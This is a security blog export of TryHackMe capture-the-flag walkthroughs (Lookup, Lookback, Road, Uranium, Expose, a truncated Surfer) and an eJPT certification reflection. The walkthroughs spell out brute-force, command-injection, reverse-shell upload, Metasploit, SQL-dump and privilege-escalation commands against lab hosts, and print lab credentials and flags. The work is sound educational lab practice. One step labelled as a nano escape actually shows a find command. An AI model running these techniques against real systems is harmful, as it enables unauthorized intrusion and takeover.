
[{"content":" Join the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe © 2026 5kullk3r. All rights reserved.\nClassification: Security Research // Educational Only\nLegal Notice\nThe writeups, exploit research, technical analyses, and security content published on this platform are intended strictly for educational purposes, CTF challenges, authorized security research, and defensive learning. All views expressed are personal and do not represent the positions, endorsements, or strategies of any employer, client, or affiliated organization.\nLiability Disclaimer\nThis platform does not endorse unauthorized access, malicious activity, disclosure of confidential information, or any form of illegal or unethical conduct. Any misuse of the information shared here falls outside its intended purpose and is strictly not tolerated. All materials are provided on an \"as-is\" basis, and users are solely responsible for their actions. The author assumes no liability for misuse, damages, or unauthorized application of the content published on this site. © 2026 5kullk3r\n[ SYSTEM: LOCKED ]\n","date":"9 May 2026","externalUrl":null,"permalink":"/","section":"Home","summary":"","title":"Home","type":"page"},{"content":" Hello everyone! This is an easy rated subscriber room from the TryHackMe platform titled “LOOKUP”\nLOOKUP- TRY HACK ME- ROOM\nThis room is classified as easy and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nOrigin of the word “Lookup” in my opinion\nPhase 1: Reconnaissance and Authentication Bypass\nInitial Scanning and Vhost Configuration\nThe investigation begins with a full-port scan and standard directory brute-forcing.\nnmap -sC -sV -p- 10.80.153.15 -T 5\nPort 22 (SSH): Standard remote access.\nPort 80 (HTTP): The primary entry point.\nI mapped the main domain to my local resolution file:\nsudo nano /etc/hosts\n10.80.153.15 lookup.thm\nVisiting lookup.thm reveals a login page.\nStandard SQL injection and default credentials failed.\nCredential Harvesting\nAfter performing user enumeration (using a specialized Python script to parse error responses), I identified two valid system usernames: admin and jose.\nCredits: To the author \u0026 ChatGPT (it’s not mine and I came across this when I was stuck)\nI targeted the jose account for a dictionary attack.\nhydra -l jose -P rockyou.txt lookup.thm http-post-form \"/login.php:username=^USER^\u0026password=^PASS^:Wrong\" -V\nResult: Successfully cracked the password:\npassword123\nPhase 2: Web Exploitation and Path Hijacking\nExploiting elFinder RCE\nLogging in revealed a sub-application hosted on a different virtual host, and trying to access it wasn’t working.\nI updated the hosts file again to include files.lookup.thm\nThis page hosted elFinder, a web file manager known for specific Remote Code Execution (RCE) vulnerabilities.\nSeeing the credentials in credentials.txt and trying to SSH in, it fails.\nHeading right away to Metasploit:\nmsfconsole\nsearch elfinder\nuse exploit/multi/http/elfinder_archive_cmd_injection (EDB-ID 46481)\nset RHOSTS files.lookup.thm\nset LHOST tun0\nrun\nThis provided a shell as the web user.\nHowever, I could not yet access user.txt or the sensitive .passwords file in the home directory.\nSUID Privilege Escalation: /usr/sbin/pwm\nI searched for SUID binaries to find a path toward the user think.\nI identified a custom binary:\n/usr/sbin/pwm\nRunning the binary revealed that it executes the id command internally.\nHowever, 
it does not use an absolute path, making it vulnerable to Path Hijacking.\nLateral Movement via Path Manipulation\nTo exploit this, I created a malicious “id” script and manipulated the system’s PATH variable so the SUID binary would execute my script instead of the real system utility.\necho -e '#!/bin/bash\\necho \"uid=1000(think) gid=1000(think) groups=1000(think)\"' \u003e /tmp/id\nchmod +x /tmp/id\nexport PATH=/tmp:$PATH\nThen,\n/usr/sbin/pwm\nExecuting the hijacked binary revealed a list of names/strings.\nI saved these into a local file, list.txt, suspecting they were potential passwords for the think user.\nPhase 3: SSH Access and Root Escalation\nCracking SSH for ‘think’\nI performed a targeted SSH brute-force attack using the file list.txt:\nhydra -l think -P list.txt ssh://10.80.160.219:22\nCredentials found:\nthink:josemario.AKA(think)\nssh think@10.80.160.219\ncat user.txt\nUser Flag:\n38375fb4dd8baa2b2039ac03d92b820e\nFinal Escalation via ‘look’\nChecking for administrative privileges:\nsudo -l\nDiscovery: (ALL) /usr/bin/look\n#The look command is designed to search for strings in a file.\n#When run with sudo, it can be used to read any file on the system, including those restricted to root.\nFollowing GTFOBins methodology:\nLFILE=/root/root.txt\nsudo look '' \"$LFILE\"\nThis successfully output the contents of the protected root file.\n5a285a9f257e45c68bb6c9f9f57d18e8\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nFeel free to drop a follow and connect with me on TryHackMe as well:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/tryhackme/lookup-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LOOKUP- TRY HACK ME- ROOM","type":"writeups"},{"content":" Welcome to my security labs and walkthroughs directory. Select a platform below to view recent machine breakdowns:\n","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/","section":"Security Labs \u0026 Writeups","summary":"","title":"Security Labs \u0026 Writeups","type":"writeups"},{"content":"","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/tryhackme/","section":"Security Labs \u0026 Writeups","summary":"","title":"TryHackMe Labs","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “LOOKBACK”\nLOOKBACK - TRY HACK ME- ROOM\nThis room is classified as easy and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nThe OG meme and the real story of school days\nPhase 1: Reconnaissance and Web Enumeration\nInitial Scanning and Service Mapping\nThe investigation begins with a full-port scan to identify the network footprint.\nnmap -sC -sV -p- 10.82.181.239 -T 5\nPort 80/443 (HTTP/HTTPS)\nPort 3389 (RDP)\nThe presence of standard Windows management and web ports suggests a target running a Windows Server environment with specialized web services.\nEnumerating subdirectories:\ngobuster dir -u http://10.82.181.239 -w /usr/share/wordlists/dirb/common.txt -t 5 --exclude-length=0\nI see: /test and /ecp.\n/ecp (Exchange Control Panel) is a strong indicator that this server is running Microsoft Exchange.\nVisiting the victim IP\nAccessing the Test Portal\nI visited the /test directory, which presented a secondary login portal.\nUsing the classic admin:admin combination, I successfully bypassed the login.\nThe First Flag:\nThe landing page immediately revealed:\nTHM{Security_Through_Obscurity_Is_Not_A_Defense}\nPhase 2: PowerShell Command Injection\nIdentifying the Injection Vector\nThe test portal featured a button intended to generate BitLocker paths.\nBy analyzing the output format, I determined the backend was likely executing PowerShell commands to fetch system information.\nI attempted to break the intended command string to inject my own logic.\n') ; dir #('\nThe ') closes the existing string/function, the ; acts as a command separator, dir is the payload to list the directory, and #(' comments out the remaining trailing characters of the original command.\nDirectory Enumeration:\n') ; dir C:\\Users\\dev\\desktop #('\nI identified two high-interest files: user.txt \u0026 TODO.txt\nData Exfiltration and Hint Retrieval\nUsing the same injection technique, I utilized the type command (PowerShell's equivalent to cat) to read the sensitive files.\n') ; type C:\\Users\\dev\\desktop\\user.txt #('\nWe get the User Flag:\nTHM{Stop_Reading_Start_Doing}\nThe Critical Hint:\n') ; type C:\\Users\\dev\\desktop\\TODO.txt #('\nThe note mentioned a “Security Update for MS Exchange” and a specific email address: dev-infrastracture-team@thm.local.\nThis is a classic “Known-User” prerequisite for Exchange exploits.\nPhase 3: Exploiting Microsoft Exchange (ProxyShell)\nLeveraging Metasploit for RCE\nThe combination of an unpatched Exchange server and a valid internal email address makes the system highly vulnerable to ProxyShell (CVE-2021-34473), which allows for unauthenticated Remote Code Execution.\nmsfconsole\nsearch exchange proxy\nuse exploit/windows/http/exchange_proxyshell_rce (or a similar ProxyLogon module)\nset RHOSTS 10.82.181.239\nset LHOST tun0\nset EMAIL dev-infrastracture-team@thm.local\nrun\nThe exploit successfully bypassed authentication and dropped me into a SYSTEM shell.\nClaiming the Final Flag\nWith full administrative control, I navigated the filesystem to retrieve the final proof of compromise.\nI checked the standard administrative directories.\ncd C:\\Users\\Administrators\\Documents\ntype flag.txt\nWe get Root Flag:\nTHM{Looking_Back_Is_Not_Always_Bad}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nAlso, do follow me on TryHackMe:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"19 April 2026","externalUrl":null,"permalink":"/writeups/tryhackme/lookback-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LOOKBACK - TRY HACK ME- ROOM","type":"writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/articles/certifications/","section":"Security Research \u0026 Articles","summary":"","title":"Certifications","type":"articles"},{"content":" Now, for those of you who have played this legendary game or seen the movies, you already know the infamous sound in the heading.\nCh-Ch-Ch… Pass-Pass-Pass: My Friday the 13th Journey to eJPT\nBut for those who don’t…. what are y’all even doing?\nGo show Jason Voorhees some love and see the movie or try the game haha\nI’m excited to share that I officially passed the eJPT (eLearnSecurity Junior Penetration Tester) certification!\nAnd I want to write this as a way to reflect on the journey.\nThe “Why”: Testing My Limits\nAfter passing CompTIA Security+, I realized I wanted something more.\nI didn’t want another standard, theoretical exam where I just checked boxes; I wanted to see if I could actually do it.\nAfter spending significant time in various practice labs and CTF rooms, I wanted to put myself in a hands-on situation to see if I was truly capable of handling a professional-grade practical challenge.\nThat’s when I discovered the eJPT v2.\nDisclaimer: The views and experiences shared in this article are purely my own. The eJPT is a certification where opinions on preparation, resources, and difficulty vary. 
This is simply my candid, personal journey, and if sharing my story helps even one person on their path, I’m genuinely happy.\nPreparing for the Exam: The 8-to-6 Grind\nWorking a demanding role meant my “9-to-5” was actually an 8-to-6.\nFinding time to study wasn’t easy.\nI had to make time wherever I could — sometimes in the early morning before anyone was up, and often late at night after a long day at the office.\nI set a hard deadline for myself, which forced me to be more efficient.\nI started finishing my daily tasks faster so I could jump straight into my practice materials.\nMy biggest piece of advice? Take extensive notes.\nI documented every scenario and every “Aha!” moment during my prep. Those notes became my ultimate weapon when the clock started ticking.\nThe Strategy:\nThe INE course is often cited as the gold standard for eJPT prep, boasting 150 hours of video lectures.\nWhile it’s recommended to go through every lesson, I took a different approach: I skimmed the theory lightly and jumped straight into the CTFs to solve them.\nHowever, life happens. I was traveling and lost access to the official materials after a couple of weeks, so I had to get resourceful.\nI curated a list of TryHackMe rooms aligned with the course topics. 
Covering and understanding them is usually enough to build the necessary flow and confidence for the actual exam environment.\nResources:\nThis is the GitHub repo I created with some resources covering the eJPT, which you can all refer to if you need a reference:\nhttps://github.com/5kullk3r/eJPTv2\nSome of the TryHackMe Rooms:\nhttps://tryhackme.com/room/wordpresscve202129447\nhttps://tryhackme.com/room/investigatingwindows\nhttps://tryhackme.com/room/ultratech1\nhttps://tryhackme.com/room/ice\nhttps://tryhackme.com/room/poster\nhttps://tryhackme.com/room/colddboxeasy\nhttps://tryhackme.com/room/toolsrus\nhttps://tryhackme.com/room/goldeneye\nhttps://tryhackme.com/room/relevant\nhttps://tryhackme.com/room/gamingserver\nhttps://tryhackme.com/room/surfer\nhttps://tryhackme.com/room/intermediatenmap\nhttps://tryhackme.com/room/expose\nhttps://tryhackme.com/room/publisher\nhttps://tryhackme.com/room/chocolatefactory\nhttps://tryhackme.com/room/jokerctf\nhttps://tryhackme.com/room/source\nhttps://tryhackme.com/room/picklerick\nhttps://tryhackme.com/room/basicpentestingjt\nhttps://tryhackme.com/room/h4cked\nAlso, some knowledge of the following, without which it will be hard:\nnmap\ndirb\nburp\nmysql\nftp \u0026 SSH\nsqlmap\nhydra\nenum4linux\nmetasploit\nwordpress \u0026 drupal (CMS)\nRDP\nThe Exam: Surviving the Legendary Friday the 13th\nI started my exam on Friday, March 13th.\nHonestly, I think Jason would have approved of the timing.\nWhile he was busy with his machete at the lake, I was busy stalking my targets through rounds of enumeration on the network.\nThe only real difference? 
My “kills” resulted in a passing score, not a horror sequel!\nWhile I can’t disclose technical specifics, here was my tactical schedule:\nDay 1 (Friday the 13th):\nI kicked off at 10:00 AM.\nI took solid breaks to reset and clear my mind.\nBy the evening — much like Jason at the end of a movie — I had already appeared right where I needed to be, securing two major milestones.\nI finally stopped at 11:00 PM for some much-needed rest.\nDay 2 (The 14th):\nI resumed at 09:30 AM and secured my final goals by the morning.\nI spent the afternoon revising every single answer before finally hitting “Submit” at 2:15 PM.\nFinal Thoughts\nUnlike other certifications, the eJPT doesn’t feel like a standard CTF; it’s a structured and scoped pentest.\nIt forces you to understand the “why” behind every attack.\nWhether it was identifying a specific Windows Server version or exploiting a CMS, the devil was truly in the details.\nIf you’re a professional balancing a job and wondering if you can make the jump into something new: Set a deadline, trust your notes, and take breaks.\nMy final score was 82%. While it was a great experience, I still have a lot to work on.\nI’m grateful to have this under my belt, but I’m far from done.\nI’m ready to get my hands even dirtier for the next endeavor!\nI’m currently selecting my next goal and am open to recommendations.\nI’m happy to answer any questions about my preparation in the comments below.\nAll the best to everyone planning to take it up — you’ve got this!\nAlso, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r/eJPTv2\nAlso, do follow me on TryHackMe:\n5kullk3r on tryhackme.com\nCheers!\nP.S. Apologies for the delayed post as I was wrapping up the exam and getting back on track 😬 ","date":"4 April 2026","externalUrl":null,"permalink":"/articles/certifications/ch-ch-ch-pass-pass-pass-my-friday-the-13th-journey-to-ejpt/","section":"Security Research \u0026 Articles","summary":"","title":"Ch-Ch-Ch… Pass-Pass-Pass: My Friday the 13th Journey to eJPT","type":"articles"},{"content":"Welcome to my research directory. Select a sector below to view recent deep dives and operational documentation:\nCERTIFICATIONS Milestone Logs \u0026 Strategies\nSECURITY RESEARCH Threat Analysis Logs\nTECHNISCH Hardware \u0026 HID Labs\n","date":"4 April 2026","externalUrl":null,"permalink":"/articles/","section":"Security Research \u0026 Articles","summary":"","title":"Security Research \u0026 Articles","type":"articles"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “ROAD”\nROAD- TRY HACK ME- ROOM\nThis room is classified as medium and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nProbably the only thing I remember from English lessons xD\nPhase 1: Reconnaissance and Authentication Bypass (IDOR)\nInitial Scanning and Service Mapping\nThe investigation begins with a full-port scan to identify the exposed attack surface.\nnmap 10.80.187.159 -sV -sC -v -p- -T 5\nThe Results:\nPort 22 (SSH): Standard remote access.\nPort 80 (HTTP): The primary web server hosting “Sky Couriers.”\nDirectory Brute-Forcing:\ngobuster dir -u http://10.80.187.159 -w /usr/share/wordlists/dirb/common.txt -t 5\nDiscovered Locations:\n/assets\n/phpMyAdmin\n/v2\nExploiting Insecure Direct Object Reference (IDOR)\nI registered a new account on the /v2 portal to inspect the internal functionality.\nWhile exploring the profile settings, I noted a restricted message:\n\"only admin has access to this feature. Please drop an email to admin@sky.thm\". This provided us with a target email address.\nThe dashboard included a password reset feature.\nI captured the password reset request in Burp Suite.\nBy intercepting the POST request, I modified the uname parameter from my own email to admin@sky.thm\nThe server processed the request based on the parameter value rather than the session identity, effectively resetting the Administrator’s password.\nI successfully logged in as the Administrator using the newly set credentials.\nPhase 2: Web Exploitation and Database Forensics\nRemote Code Execution (RCE) via File Upload\nAs the Administrator, I had access to a profile image upload feature.\nI uploaded a PHP reverse shell. 
While the UI didn’t provide a direct link, the Burp Suite response headers/source code revealed the storage path:\nDirectory listing was disabled on /v2/profileimages/, but by manually navigating to my specific filename, I triggered the shell.\nListener:\nnc -lvnp 2233\nTrigger: http://10.80.187.159/v2/profileimages/php-reverse-shell.php\ncat /home/webdeveloper/user.txt\nWe get User Flag:\n63191e4ece37523c9fe6bb62a5e64d45\nMongoDB Post-Exploitation\nI needed to escalate to the user webdeveloper.\nI checked the running processes to identify sensitive services.\nps -ef\nrevealed that MongoDB and MySQL were running.\nI accessed MongoDB to search for stored credentials.\nmongo\nshow databases;\nuse backup;\ndb.user.find()\nWe see a document containing credentials for the user webdeveloper.\nCredentials:\nwebdeveloper : BahamasChapp123!@#\nPhase 3: Privilege Escalation to Root\nPolKit (pkexec) Exploitation\nWith the discovered credentials, I established a stable SSH session. Checking sudo -l showed a custom utility (), but I turned to a more direct method of escalation involving PolKit.\nAttempting to run pkexec /bin/bash usually requires an interactive GUI-based authentication agent.\nSince we are in a headless SSH session, we must manually handle the TTY agent.\nThe Method:\nOpen two SSH sessions as webdeveloper.\nSession 1: Get the Process ID (PID) using\necho $$\nSession 2: Initialize a TTY agent to handle the authentication for that PID:\npkttyagent --process [PID_FROM_SESSION_1]\nBack at Session 1: Execute the escalation:\npkexec \"/bin/bash\"\nSession 2: Provide the password:\nBahamasChapp123!@#\nClaiming the Final Flag\nThe authentication was successfully handled by the second session, granting a root shell in the first session.\nBACK AT 1st SESSION:\ncd /root\ncat root.txt\nRoot Flag:\n3a62d897c40a815ecbe267df2f533ac\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can.\nAlso, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on TryHackMe:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"22 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/road-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ROAD- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a hard rated room from the TryHackMe platform titled “URANIUM CTF”\nURANIUM CTF- TRY HACK ME- ROOM\nThis room is classified as hard and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLiterally the political talk globally; I learnt this thanks to the Stuxnet research. If you aren’t aware of Stuxnet, feel free to check out my article covering it.\nPhase 1: Reconnaissance and SMTP Exploitation\nInitial Scanning and Vhost Setup\nThe investigation begins with a full-port scan. 
The presence of an open SMTP port is the primary lead for initial access.\nnmap -sC -sV -p- 10.81.145.20 -T 5\nPort 25 (SMTP): Used for sending emails.\nPort 80 (HTTP): Hosting the Uranium Coin website.\nBased on hints, I mapped the IP to the domain:\nsudo nano /etc/hosts\n10.81.145.20 uranium.thm\nGaining a Foothold via Email Attachment\nA hint on Twitter suggested that the user hakanbey processes applications sent via email. Specifically, we can send a file named application which the system likely executes or parses.\nI created a file named application containing a bash reverse shell.\nUsing the sendemail utility, I targeted the internal user.\nsendemail -t hakanbey@uranium.thm -f thm@thm.com -s 10.81.145.20 -u \"Hi\" -m \"here\" -a application -o tls=no\nOpen the listener on the side and we see the server processed the attachment and executed my shell.\ncat user_1.txt\nWe get User 1 Flag:\nthm{2aa50e58fa82244213d5438187c0da7c}\nPhase 2: Network Forensics and Lateral Movement\nAnalyzing the Network Logs\nInside Hakanbey’s home directory, I found a chat binary (chat_with_kral4) that required a password.\nI checked /var/www and found a packet capture (.pcap) file.\nI hosted the file using Python:\npython3 -m http.server\nOn our local system we get the file:\nI opened hakanbey_network_log.pcap in Wireshark.\nFollowing the TCP stream on the first few packets revealed a plaintext string being passed.\nThe chat password was MBMD1vdpjg3kGv6SsIz56VNG\nRunning ./chat_with_kral4 and entering the password revealed Hakanbey's system password in the conversation:\nMys3cr3tp4sw0rD\nMoving to User: Kral4\nWith valid credentials, I moved toward the next user.\nsudo -l\nrevealed that Hakanbey could run /bin/bash as the user kral4.\nPivoting:\nsudo -u kral4 /bin/bash\ncat /home/kral4/user_2.txt\nWe get User 2 Flag:\nthm{804d12e6d16189075db2d45449aeda5f}\nPhase 3: Privilege Escalation via File Manipulation\nExploiting /bin/dd\nLet’s get LinPEAS in here:\nSeeing the results of LinPEAS, I found interesting binaries and discovered that kral4 had access to /bin/dd\nThe Vulnerability: dd can be used to read files that the user otherwise cannot access.\nI used dd to read the restricted web_flag.txt\n/bin/dd if=/var/www/html/web_flag.txt\nEscalation to Root (The Nano/Passwd Method)\nA mail file in /var/mail/kral4 hinted at using nano in the home folder to fix the website's index.html.\nThis suggested a scheduled task (cron job) might be running as root to check that file.\nI copied nano to the home directory as suggested.\nBy gaining a SUID copy of nano, we can edit the /etc/passwd file to elevate our user's permissions.\nThe Edit:\n./nano /etc/passwd\nI located the line for hakanbey: hakanbey:x:1000:1000...\nNow,\nI changed the UID and GID to 0:0 (the root identifiers).\nUpdated Line:\nhakanbey:x:0:0:hakanbey:/home/hakanbey:/bin/bash\nClaiming the Final Flag\nAfter saving the changes, the system now recognized hakanbey as having root-level privileges.\nsu - hakanbey #(Password: Mys3cr3tp4sw0rD)\ncat /root/root.txt\nWe get the Root Flag:\nthm{81498047439cc0426bafa1db5da699cd}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nAlso, do follow me on TryHackMe:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/uranium-ctf-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"URANIUM CTF- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! 
This is an easy rated room from the TryHackMe platform titled “EXPOSE”\nEXPOSE- TRY HACK ME- ROOM\nThis room is classified as easy and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nEveryone at least once in their life lol\nPhase 1: Service Enumeration and Web Discovery\nComprehensive Nmap Scan\nThe investigation begins with a thorough port scan.\nSince the victim IP did not respond to standard browser requests on port 80, a full-port scan was necessary to discover where the services were actually hiding.\nStart with an nmap scan:\nnmap 10.81.136.134 -sV -sC -v -Pn -p-\nI see ports 21 (FTP), 22 (SSH), 53 (DNS), 1337 (HTTP), and 1883 (MQTT) open.\nThe presence of port 1337 is a strong indicator of a web service running on a non-standard port, which is often used to hide administrative or development portals.\nInitial Enumeration (FTP and Web)\nI first attempted to access the FTP service using default anonymous credentials to see if any configuration files or notes were left behind.\nLet’s try accessing through FTP using default creds anonymous:anonymous\nftp 10.81.136.134\nbut I see nothing that is of any use.\nWith FTP being a dead end, I shifted focus to the web service on port 1337 and began directory brute-forcing using a common wordlist.\nChecking hidden subdirectories:\ngobuster dir -u http://10.81.136.134:1337 -w /usr/share/wordlists/dirb/common.txt\nWe see: /admin, /index.php, and /phpmyadmin\nVisiting http://10.81.136.134:1337 shows a page titled EXPOSED\nVisiting http://10.81.136.134:1337/admin shows a login page; however, 
exploring it reveals that the login button does not function, suggesting it might be a decoy or a broken asset.\nPhase 2: Exploiting SQL Injection\nAdvanced Fuzzing and SQLi Identification\nSince the initial admin page was non-functional, I tried changing the wordlist to uncover more obscured directories.\nTrying out other wordlists:\ngobuster dir -u http://10.81.136.134:1337 -w /usr/share/wordlists/dirb/big.txt -t 4\nWe see /admin_101\nChecking this new path, I see a specific username already present in the field: hacker@root.thm\nThis presented a perfect opportunity to test for SQL injection.\nI captured the login request in Burp Suite to analyze the interaction between the front end and the database.\nI see the request body format: email=hacker%40root.thm\u0026password=\nSignificantly, the response reveals the backend query: SELECT * FROM user WHERE email = 'hacker@root.thm'\nAutomated Data Extraction with SQLMap\nThe reflected SQL query confirmed the vulnerability.\nI saved the intercepted request as req.req and used sqlmap to dump the database contents. 
In the terminal:\nsqlmap -r req.req --dbs --batch\nWe see the database name expose, which immediately hints back to the webpage title we saw earlier.\nsqlmap -r req.req -p 'password, email' -D expose --tables\nWe see 2 tables: user and config\nI then dumped the contents from the user table to search for usable credentials.\nsqlmap -r req.req -p 'password, email' --batch -D expose -T user --columns --dump\nWe see the password:\nVeryDifficultPassword!!#@#@!#!@#1231\nAttempting to log in with this password returns a message saying “we are at capacity,” which effectively makes this path useless for direct access.\nI pivoted to the config table to see if it contained any system-level information.\nsqlmap -r req.req -p 'password, email' --batch -D expose -T config --columns --dump\nThis dump reveals two hidden paths and a password:\n/file1010111/index.php with the credential easytohack\n/upload-cv00101011/index.php\nPhase 3: LFI to Remote Code Execution (RCE)\nParameter Fuzzing and Local File Inclusion (LFI)\nI accessed the first hidden path found in the config table.\nAccess:\nhttp://10.81.136.134:1337/file1010111/index.php\nUse password easytohack to get in.\nThe page provides a hint regarding parameter fuzzing, hidden in the DOM.\nInspecting the page source and structure further hints at using a GET parameter.\nI tested this for Local File Inclusion (LFI) by attempting to read the system’s user list.\nAccessing the /etc/passwd file: http://10.81.136.134:1337/file1010111/index.php?file=/etc/passwd\nWhile inspecting the output, the username zeamkish caught my eye.\nBypass Upload Restrictions\nRecalling the second hidden path from the database, /upload-cv00101011/index.php, I navigated there and saw a hint that the necessary parameter starts with the letter \"z\".\nThis confirms that zeamkish is the correct target.\nThe upload form only permits .png files, so I implemented an extension bypass.\nFirst, I renamed my PHP reverse shell file to end in .png\nKeeping Burp Suite intercept active, I uploaded the file.\nIn the captured Burp request, I edited the filename back to .php and forwarded the packet.\nI then needed to find where the file was stored.\nInspecting the upload page after the success message revealed a directory: /upload_thm_1001.\nAccessing the upload directory:\nhttp://10.81.136.134:1337/upload-cv00101011/upload_thm_1001/\nI see my reverse shell file sitting there.\nBack in the terminal, I opened a listener:\nnc -lvnp 2233\nI clicked the file on the webpage and successfully caught the shell.\nPhase 4: Privilege Escalation\nUser Access and SSH Persistence\nOnce I had a shell as the web user, I explored the home directories to find a way to stabilize the connection.\ncd home\ncd zeamkish\ncat ssh_cres.txt\nWe see the SSH credentials:\neasytohack@123\nUsing these credentials, I logged in via SSH for a much more stable and functional terminal environment.\nssh zeamkish@10.81.136.134\ncat flag.txt\nAnd we get the user flag:\nTHM{USER_FLAG_1231_EXPOSE}\nRoot Escalation via SUID Nano\nFinally, I began looking for a way to escalate to root.\nsudo -l did not allow any attempts, so I shifted to searching for binaries with the SUID bit set.\nfind / -perm -4000 -type f 2\u003e/dev/null\nI see /usr/bin/nano in the list.\nI consulted GTFOBins for a nano-based SUID escape. This allows us to break out of the editor into a root-level shell.\nfind . -exec /bin/sh -p \\; -quit\nThis escalates our privilege.\nwhoami (this confirms we are now root)\ncd /root\ncat flag.txt\nAnd, we get the root flag:\nTHM{ROOT_EXPOSED_1001}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"7 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/expose-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"EXPOSE- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an easy rated subscriber room from the TryHackMe platform titled “SURFER” SURFER- TRY HACK ME- ROOMHello everyone! This is an easy rated subscriber room from the TryHackMe platform titled “SURFER”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nKeep this in mind as the remaining 10 months of 2026 come lolPhase 1: Enumeration and Initial AccessNmap Scan and Service IdentificationWe begin by initiating an Nmap scan to identify open ports and services on the target machine.\nStart with nmap scan:\nnmap 10.80.189.192 -sV -sC -vWe see 22 (SSH) and 80 (HTTP) open\nWe navigate to the victim’s IP address in the browser.\nA manual inspection of the source code reveals nothing useful, so we check for common hidden files.\nChecking robots.txt we see /backup/chat.txt\nChecking it out we see the hint for the username and password thanks to Kate\nBypassing the LoginThe landing page presents a login prompt.\nThe chat hint suggested credentials\nSo trying admin:admin and it works\nPhase 2: Identifying the SSRF VulnerabilityDiscovering Internal AssetsOnce logged in, we explore the application’s features and documentation.\nScrolling through the page we see the export2pdf feature\nWe also see mention of internal/admin.php\nAttempting to access http://10.80.189.192/internal/admin.php directly results in an error message stating it can only be accessed locally.\nThis is a clear indicator that the server is configured to trust requests coming from itself (localhost).\nExploiting SSRF via Burp SuiteThe export2pdf functionality is a prime target for SSRF because the server must \"fetch\" content to convert it into a PDF document.\nWe use Burp Suite to intercept and modify this request.\nOpening Burp Suite to capture the request\nWe capture the POST request by clicking 